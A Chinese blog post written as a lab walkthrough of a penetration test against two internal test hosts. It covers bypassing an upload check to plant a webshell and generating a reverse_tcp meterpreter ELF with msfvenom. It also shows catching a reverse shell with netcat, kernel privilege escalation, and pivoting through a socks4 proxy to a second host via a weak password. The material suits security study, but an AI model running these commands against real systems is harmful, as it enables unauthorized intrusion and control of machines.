socks4代理网络渗透测试实验

            实验目的:利用代理功能对2层网络进行渗透
  测试靶机  ubantu 192.168.31.207  192.168.1.129
                  ubantu  192.168.1.100 

首先访问192.168.31.207

一个简单得上传界面,这个界面做了文件类型的检测,直接上传是不行的,我们选择一句话木马,然后抓包修改文件类型,将

改为
放包就上传成功了

菜刀连接文件地址

kali打开msf控制台,设置模块exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.31.43
set LPORT 8888
利用msfvenom生成elf木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.43 LPORT=8888 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >1.elf
利用菜刀上传php大马,并将生成的elf木马上传到目标机
进入大马进行反弹shell提权
kali本地监听12388端口 nc -lvvp 12388

大马进行反弹shell

反弹成功
uname -a 查看内核版本 并对上传对应的提权脚本进行提权 我用的是3.3.13内核的脚本
gcc shell.c -o shell
./shell
提权成功
我们给上传的elf木马权限并执行
chmod 777 1.elf
./elf
成功获得一个会话连接
添加一个路由 run autoroute -s 192.168.1.0/24

本地设置socks4代理
use auxiliary/server/socks4a
set SRVPORT 9999
开启新的终端 编辑 vim /etc/proxychains.conf
将设置的socks4添加进末尾
代理打开firefox

访问192.168.1.100
弱口令登陆后台,在设置处添加可以上传的文件类型 其他格式添加php,PHP,php3

添加新文章上传php大马
直接拖拽成功上传后,可以查看路径,直接访问地址
由于msf的路由功能不稳定,所以代理得到的会话很不稳定,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具,如regerog+proxifier,regeorg+proxychains等相对稳定工具,当然如果自己有公网ip的话,还可以使用端口转发工具,这里就不赘述了
以上操作仅供大家学习参考使用,

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值